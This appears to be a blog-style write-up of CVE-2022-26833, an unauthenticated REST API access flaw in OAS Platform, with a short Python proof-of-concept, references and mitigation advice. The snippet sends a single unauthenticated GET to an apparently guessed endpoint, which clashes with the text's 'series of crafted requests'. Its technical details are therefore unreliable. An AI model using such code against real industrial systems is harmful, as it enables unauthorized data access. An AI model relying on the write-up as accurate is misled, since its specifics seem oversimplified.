CVE-2022-26833 - Unauthenticated REST API Access in Open Automation Software OAS Platform v16.00.0121

Security researchers have discovered an improper authentication vulnerability in the REST API functionality of the Open Automation Software (OAS) Platform version 16.00.0121. The vulnerability, tracked as CVE-2022-26833, allows an attacker to send a series of specially-crafted HTTP requests to gain unauthorized access, and potentially manipulate data or access sensitive information. This long read post will explore the details of the vulnerability and provide sample code snippets to demonstrate exploitation, as well as links to original references.

Vulnerability Details

The issue stems from improper authentication checks within the REST API functionality in OAS Platform v16.00.0121. By crafting a series of HTTP requests, an attacker can gain unauthenticated use of the REST API and potentially manipulate data or gain access to sensitive information. This makes the vulnerability a serious concern to administrators and security teams.

Exploit Details

To exploit the CVE-2022-26833 vulnerability, an attacker must send a series of crafted HTTP requests to the OAS Platform's REST API endpoint. The following code snippet demonstrates this by sending a GET request to the /api/v1/data endpoint to retrieve information about data points within the system:

import requests

target_base_url = "http://oas-server:port";
api_endpoint = "/api/v1/data"
url = target_base_url + api_endpoint

response = requests.get(url=url)

if response.status_code == 200:
    print("Access granted. Data retrieved:")
    print(response.text)
else:
    print("Request failed with status_code:", response.status_code)

In this example, replace http://oas-server:port with the base URL of the target OAS server and port number. If the exploit is successful, the script will output "Access granted" and display the retrieved data.

For more information on this vulnerability, please refer to the following resources

1. CVE Identifier: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26833
2. NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-26833
3. Open Automation Software (OAS) official website: https://www.openautomationsoftware.com/

Mitigation and Patching

To mitigate CVE-2022-26833, it's recommended to implement proper authentication mechanisms for the OAS platform's REST API, ensuring that unauthorized users cannot access sensitive data or perform restricted actions. Additionally, Open Automation Software should release a patched version of the software to address this vulnerability. System administrators and users should install the updated version as soon as it becomes available.

Conclusion

CVE-2022-26833 is a critical improper authentication vulnerability in the Open Automation Software OAS Platform V16.00.0121. By exploiting this vulnerability, an attacker can gain unauthorized access to the REST API, potentially compromising system integrity and data confidentiality. System administrators and security teams should be aware of this vulnerability and apply the necessary patches and protections to prevent exploitation.

Timeline

Published on: 05/25/2022 21:15:00 UTC
Last modified on: 06/03/2022 03:27:00 UTC